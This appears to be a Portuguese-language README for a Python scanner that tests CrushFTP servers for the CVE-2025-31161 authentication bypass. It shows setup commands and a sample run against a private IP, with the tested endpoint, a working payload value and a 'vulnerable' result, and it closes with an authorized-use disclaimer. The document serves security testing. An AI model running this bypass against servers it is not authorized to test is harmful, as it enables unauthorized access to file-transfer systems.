
Scans target to see if its vulnerable to CVE-2025-31161
Uma ferramenta Python para detectar e testar a vulnerabilidade CVE-2025-31161 em servidores CrushFTP.
Este script testa a vulnerabilidade de bypass de autenticação (CVE-2025-31161) em servidores CrushFTP, que permite que atacantes remotos se autentiquem sem credenciais válidas por meio da manipulação do cabeçalho HTTP Authorization.
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
Digite o endereço IP do alvo: 192.168.1.100
Digite a porta do alvo [8080]: 8080
==================================================
📡 Testando: /WebInterface/
🔑 Payload: 'A'
📊 Status: 200
🎉 VULNERABILIDADE CONFIRMADA
💡 200 OK com conteúdo: dashboard, main
✅ Payload funcional: 'A'
==================================================
🎯 Alvo: 192.168.1.100:8080
🔴 STATUS DA VULNERABILIDADE: VULNERÁVEL
💥 Bypass de Autenticação CVE-2025-31161 CONFIRMADO
✅ Payloads funcionais:
==================================================
Esta ferramenta é apenas para fins educacionais e de testes autorizados. Utilize somente em sistemas que você possui ou para os quais tenha permissão explícita para testar.